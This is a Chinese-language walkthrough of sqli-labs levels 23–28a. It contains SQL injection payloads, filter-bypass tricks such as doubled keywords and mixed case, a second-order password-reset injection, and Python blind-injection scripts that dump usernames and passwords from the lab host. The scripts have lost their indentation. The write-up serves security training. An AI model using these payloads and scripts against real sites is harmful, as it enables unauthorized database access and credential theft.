23、第二十三关
data:image/s3,"s3://crabby-images/d2d4d/d2d4d3657867b86128d5e05eb7e9c83dad938a18" alt=""
id=1'单引号闭合
data:image/s3,"s3://crabby-images/74fe0/74fe046e49acae3b1f49e85334ea949d579017aa" alt=""
找位置1' and 1=2 union select 1,2,3'
data:image/s3,"s3://crabby-images/22712/2271216f3e7937cbcabed241215051bcc29b423a" alt=""
爆库:1' and 1=2 union select 1,2,database()'
data:image/s3,"s3://crabby-images/d41b7/d41b76e89bb3b4d888fd5bcdc0feaf2aff4b3d4a" alt=""
爆表名:1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' '
data:image/s3,"s3://crabby-images/dc145/dc145327e03d8a20318b2a46145b6e2c69589cdd" alt=""
爆字段:1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' '
爆数据:1' and 1=2 union select 1,2,group_concat(username,':',password) from users where '1'='1
data:image/s3,"s3://crabby-images/32df9/32df9e8ca743e3731e29c2cbcce6ef221108df01" alt=""
24、第二十四关
data:image/s3,"s3://crabby-images/95714/95714589724808e677c9ff3a2f96d1c35f4d9d72" alt=""
我们先注册一个账号admin'#,密码设为123
data:image/s3,"s3://crabby-images/6cd91/6cd9155464d1640058bb194e034b09e26ef0ab4e" alt=""
然后登录进去,有个重置密码:
data:image/s3,"s3://crabby-images/12a96/12a96adfa6154416cf21984dcea57ec926b09de4" alt=""
输入当前密码123,新密码111,然后点Reset
data:image/s3,"s3://crabby-images/0a75a/0a75a84d5a74f59de2ee725823367e2101751d45" alt=""
然后我们用新密码登录试试
发现修改后的密码111没法登录admin'#账号,还得用原来密码登录
用新密码111登录admin账号试试
data:image/s3,"s3://crabby-images/6cd0e/6cd0ea3c99e6bf5125ef4f73e1336e14a4b43c44" alt=""
发现可以登陆成功,我们刚才改的用该是admin的密码
data:image/s3,"s3://crabby-images/e8dfe/e8dfe13b811251431ea464828aa2b0e7d02f61ca" alt=""
这个应该就是传说中的二次注入吧
修改密码是应该是没转移用户名导致的,修改语句应该是下面这样,$username里特殊字符没转译
update users set password='password' where username='username'
25:、第二十五关
data:image/s3,"s3://crabby-images/63d94/63d945969377961760c9b3cbb0554059ab48dd98" alt=""
这关是单引号闭合,提示过滤了and,or,那就只能用其他代替比如like
data:image/s3,"s3://crabby-images/e25c2/e25c2c6bc3f9a3eb7125582dcf209b8b97e673b1" alt=""
like绕过:1'like 1=2 like extractvalue(1,concat(0x7e,database(),0x7e))--+
data:image/s3,"s3://crabby-images/81dc4/81dc434624b7e93524278f0c1e79bff9d09bdc2e" alt=""
双写绕过:1' anandd 1=2 like extractvalue(1,concat(0x7e,database(),0x7e))--+
data:image/s3,"s3://crabby-images/88ece/88ecebd8371530a65a78e14c968128bc696630b4" alt=""
anand 或oorr这样
25a、第二十五a关
data:image/s3,"s3://crabby-images/b6201/b6201e3f65e2f6324c1008cfd4f830af88fc09a7" alt=""
这关提示大写的OR和AND过滤了
这个id是数值型的,也可以用双写绕过
100%20anandd%201=1%20union%20select%201,2,3#
data:image/s3,"s3://crabby-images/ce000/ce00037132ea6f36403d198f9c8872bf9cf1524a" alt=""
爆库:
and双写:100 anandd 1=1 union select 1,2,database()#
or双写:100 oorr 1=0 union select 1,2,database()#
like绕过:100 like 1=2 union select 1,2,database()#
data:image/s3,"s3://crabby-images/53918/53918f12dcb83e8d33c5ea0a335bbe75668d527d" alt=""
100 union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema='security' #
infoorrmation_schema里面包含or也可以双写绕过
data:image/s3,"s3://crabby-images/b0b42/b0b42d34a2d63ed9b3d19803e0af48d32a0b4051" alt=""
26、第二十六关
这关是单引号闭合,提示过滤空格
data:image/s3,"s3://crabby-images/90af0/90af0035bf6ef1e0078b389b17b2aab99fbd959c" alt=""
这关and和or过滤了,空格也过滤了,可以用||替换or,%26替换and用报错注入
POC:1'%26extractvalue(1,concat(0x7e,database(),0x7e))%261='1
data:image/s3,"s3://crabby-images/a1fd3/a1fd319fa153a415fc8146d361196d238875a8c4" alt=""
POC:1'||extractvalue(1,concat(0x7e,database(),0x7e))||1='1
data:image/s3,"s3://crabby-images/73e90/73e90b529b7cf4d7bfb58a3d508892557a0a436c" alt=""
POC:1'||extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='security')),0x7e))||1='1
data:image/s3,"s3://crabby-images/17226/1722611bb5de6f7b164222918e6de58467ba3f03" alt=""
26a、第二十六a关
这关和26管类似,但是以单引号加括号闭合
id=1')%26('1')=('1
data:image/s3,"s3://crabby-images/c5031/c503173fe6ba0069cf5165bcb6309379e4ada0d7" alt=""
无法使用报错注入,只能用盲注
爆库POC:1')%26(substr(database(),1,1)='s')%26('1')=('1
爆表名POC:
1')%26(substr((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='security')),1,1)='e')%26('1')=('1
上脚本:
import string
from time import time, sleep
import requests
numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "(", ")", "_","UNHEX('2D')", ",", ".", "{", "}", "[", "]", ":", ";", "|"]
if __name__ == '__main__':
test = True
# 获取正确返回内容长度
url = "http://sqli.labs/Less-26a/?id=1%27)"
list1 = numbers + letters2 + fuhao
# 获取数据库名
database = ""
num = 0
print(f"数据库:")
for p in range(50):
if num > len(list1) * 2:
break
for a in list1:
num += 1
url_db = url + f"%26(substr(database(),{p},1)='{a}')%26('1')=('1"
res = requests.get(url_db)
if "Dumb" in res.text:
database = f"{database}{a}"
print(a, end='')
num = 0
print("")
# 获取所有表名
num = 0
tables = ""
print(f"所有表名:")
for p in range(1000):
if num > len(list1) * 2:
break
for a in list1:
url_db = url + f"%26(substr((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='{database}')),{p},1)='{a}')%26('1')=('1"
num += 1
res = requests.get(url_db)
if "Dumb" in res.text:
tables = f"{tables}{a}"
print(a, end='')
num = 0
print("")
# 获取users表所有字段
columns = ""
print(f"users表所有字段名:")
num = 0
for p in range(1000):
if num > len(list1) * 2:
break
for a in list1:
url_db = url + f"%26(substr((select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema='{database}')%26(table_name='users')),{p},1)='{a}')%26('1')=('1"
num += 1
res = requests.get(url_db)
if "Dumb" in res.text:
columns = f"{columns}{a}"
print(a, end='')
num = 0
print("") # 换行
# 获取所有账号
users = ""
print(f"所有用户密码:")
num = 0
for p in range(1000):
if num > len(list1) * 2:
break
for a in list1:
url_db = url + f"%26(substr((select(group_concat(username,':',passwoorrd))from(users)),{p},1)='{a}')%26('1')=('1"
num += 1
res = requests.get(url_db)
if "Dumb" in res.text:
users = f"{users}{a}"
print(a, end='')
num = 0
data:image/s3,"s3://crabby-images/d6af6/d6af60637539fa6bbb7dbe5c8a2bbd9313374f29" alt=""
27、第二十七关
直接试探1 union select 1,2,3
data:image/s3,"s3://crabby-images/bbae6/bbae6e79517598430b9c4e3746fad174b3648193" alt=""
发现查的是id=11的值,select和union都被过滤,可以大小写绕过,尝试发现是单引号闭合
构造poc:
1'and(extractvalue(1,concat(0x7e,database(),0x7e))) or '1'='1
data:image/s3,"s3://crabby-images/93fde/93fdec47b58874d5b90776fd06bc263a3abc247c" alt=""
1'and(extractvalue(1,concat(0x7e,(SeLect (group_concat(table_name)) from (information_schema.tables) where (table_schema='security')),0x7e))) or '1'='1
data:image/s3,"s3://crabby-images/e404a/e404aef328930917be845fc595f99c013315c176" alt=""
1'and(extractvalue(1,concat(0x7e,(SeLect (group_concat(column_name)) from (information_schema.columns) where (table_schema='security')and(table_name='users')),0x7e))) or '1'='1
data:image/s3,"s3://crabby-images/3d50d/3d50dc0df02417e319d681791ecd7db7488c1aaf" alt=""
1'and(extractvalue(1,concat(0x7e,(SeLect (group_concat(username,':',password)) from (users)),0x7e))) or '1'='1
data:image/s3,"s3://crabby-images/b8650/b865007ef2baf9eba66e1fed7b7b2ca9a74183a3" alt=""
27a、第二十七a关
提示双引号闭合,试探一下
data:image/s3,"s3://crabby-images/1a1ce/1a1cee6c0201292e983ea7040b2c1d49e63edee1" alt=""
没有报错信息,只能盲注
data:image/s3,"s3://crabby-images/1ebcc/1ebccb99fba2c513d89056cce06440661d6ac214" alt=""
1"and(length(database())>8)and"1"="1
data:image/s3,"s3://crabby-images/2f565/2f565c90f231ec895504e4bf2193d7695d1506c0" alt=""
1"and(length(database())>7)and"1"="1
data:image/s3,"s3://crabby-images/a84ee/a84ee8fd097fec25db0344e38aafd1ebca41b565" alt=""
database()的长度是8
这个还是脚本爆料:
import string
from time import time, sleep
import requests
numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "(", ")", "_", "UNHEX('2D')", ",", ".", "{", "}", "[", "]", ":", ";", "|"]
if __name__ == '__main__':
test = True
# 获取正确返回内容长度
url = "http://sqli.labs/Less-27a/?id=1%22"
list1 = numbers + letters2 + fuhao
# 获取数据库名
database = ""
num = 0
print(f"数据库:")
for p in range(50):
if num > len(list1) * 2:
break
for a in list1:
num += 1
url_db = url + f"and(substr(database(),{p},1)='{a}')and%221%22=%221"
res = requests.get(url_db)
if "Dumb" in res.text:
database = f"{database}{a}"
print(a, end='')
num = 0
print("")
# 获取所有表名
num = 0
tables = ""
print(f"所有表名:")
for p in range(1000):
if num > len(list1) * 2:
break
for a in list1:
url_db = url + f"and(substr((SelEct(group_concat(table_name))from(information_schema.tables)where(table_schema='{database}')),{p},1)='{a}')and%221%22=%221"
num += 1
res = requests.get(url_db)
if "Dumb" in res.text:
tables = f"{tables}{a}"
print(a, end='')
num = 0
print("")
# 获取users表所有字段
columns = ""
print(f"users表所有字段名:")
num = 0
for p in range(1000):
if num > len(list1) * 2:
break
for a in list1:
url_db = url + f"and(substr((sEleCt(group_concat(column_name))from(information_schema.columns)where(table_schema='{database}')%26(table_name='users')),{p},1)='{a}')and%221%22=%221"
num += 1
res = requests.get(url_db)
if "Dumb" in res.text:
columns = f"{columns}{a}"
print(a, end='')
num = 0
print("") # 换行
# 获取所有账号
users = ""
print(f"所有用户密码:")
num = 0
for p in range(1000):
if num > len(list1) * 2:
break
for a in list1:
if a == "UNHEX('2D')":
url_db = url + f"and(substr((selEcT(group_concat(username,':',password))from(users)),{p},1)={a})and%221%22=%221"
else:
url_db = url + f"and(substr((selEcT(group_concat(username,':',password))from(users)),{p},1)='{a}')and%221%22=%221"
num += 1
res = requests.get(url_db)
if "Dumb" in res.text:
if a == "UNHEX('2D')":
a = '-'
users = f"{users}{a}"
print(a, end='')
num = 0
data:image/s3,"s3://crabby-images/610b6/610b6d725d1d6831596464d1e82d242b199c795c" alt=""
28、第二十八关
尝试后发现也是单引号闭合,且过滤空格,没有报错信息,也需要盲注
data:image/s3,"s3://crabby-images/ee91a/ee91ace8620713304b7e5060efdfa8f86c1ea149" alt=""
1'and(length(database())>8)and'1'='1
data:image/s3,"s3://crabby-images/ccfb6/ccfb654da2b86226c067209a949a76f0929f925b" alt=""
1'and(length(database())>7)and'1'='1
data:image/s3,"s3://crabby-images/38fc5/38fc5ff9e6f54da1f98b3ef7400e74bc01fb023f" alt=""
数据库长度应该是8
盲注还得看脚本
import string
from time import time, sleep
import requests
numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "(", ")", "_", "UNHEX('2D')", ",", ".", "{", "}", "[", "]", ":", ";", "|"]
if __name__ == '__main__':
test = True
# 获取正确返回内容长度
url = "http://sqli.labs/Less-28/?id=1'"
list1 = numbers + letters2 + fuhao
# 获取数据库名
database = ""
num = 0
print(f"数据库:")
for p in range(50):
if num > len(list1) * 2:
break
for a in list1:
num += 1
url_db = url + f"and(substr(database(),{p},1)='{a}')and'1'='1"
res = requests.get(url_db)
if "Dumb" in res.text:
database = f"{database}{a}"
print(a, end='')
num = 0
print("")
# 获取所有表名
num = 0
tables = ""
print(f"所有表名:")
for p in range(1000):
if num > len(list1) * 2:
break
for a in list1:
url_db = url + f"and(substr((SelEct(group_concat(table_name))from(information_schema.tables)where(table_schema='{database}')),{p},1)='{a}')and'1'='1"
num += 1
res = requests.get(url_db)
if "Dumb" in res.text:
tables = f"{tables}{a}"
print(a, end='')
num = 0
print("")
# 获取users表所有字段
columns = ""
print(f"users表所有字段名:")
num = 0
for p in range(1000):
if num > len(list1) * 2:
break
for a in list1:
url_db = url + f"and(substr((sEleCt(group_concat(column_name))from(information_schema.columns)where(table_schema='{database}')%26(table_name='users')),{p},1)='{a}')and'1'='1"
num += 1
res = requests.get(url_db)
if "Dumb" in res.text:
columns = f"{columns}{a}"
print(a, end='')
num = 0
print("") # 换行
# 获取所有账号
users = ""
print(f"所有用户密码:")
num = 0
for p in range(1000):
if num > len(list1) * 2:
break
for a in list1:
if a == "UNHEX('2D')":
url_db = url + f"and(substr((selEcT(group_concat(username,':',password))from(users)),{p},1)={a})and'1'='1"
else:
url_db = url + f"and(substr((selEcT(group_concat(username,':',password))from(users)),{p},1)='{a}')and'1'='1"
num += 1
res = requests.get(url_db)
if "Dumb" in res.text:
if a == "UNHEX('2D')":
a = '-'
users = f"{users}{a}"
print(a, end='')
num = 0
28a、第二十八a关
这关貌似和28关没啥区别,同样方法尝试
1'and(length(database())>7)and'1'='1
data:image/s3,"s3://crabby-images/9376f/9376f160a18573ec83f29c8fdff878a3ff1a6830" alt=""
1'and(length(database())>8)and'1'='1
data:image/s3,"s3://crabby-images/9bf25/9bf250de3311bbd7d492d40c64d76daf0d405485" alt=""
尝试后发现过滤了union select
看过源码后发现是单引号加括号闭合,于是构造轮子尝试union select可以双写绕过
31') unionunion select select 3,2,1 and('1')=('1
data:image/s3,"s3://crabby-images/2d772/2d77258b8786561409de8942b7ee73dab25dba9b" alt=""
爆库:31') unionunion select select 1,database(),3 and ('1')=('1
data:image/s3,"s3://crabby-images/946f8/946f8e1aa1d80c04138f5b0137dc22d5b981d26c" alt=""
31') unionunion select select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security') ,3 and ('1')=('1
data:image/s3,"s3://crabby-images/c035e/c035e45f2bba0f6c389a54ded9ecc94219ea79b4" alt=""
31') unionunion select select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 and ('1')=('1
data:image/s3,"s3://crabby-images/ccba5/ccba500ac9f46277195c181e23d7fb1c0863e8e0" alt=""
31') unionunion select select 1,(select group_concat(username,'~',password) from users),3 and ('1')=('1
data:image/s3,"s3://crabby-images/b64a1/b64a18ba2811d30e82969cfd6f24938f3cbb9093" alt=""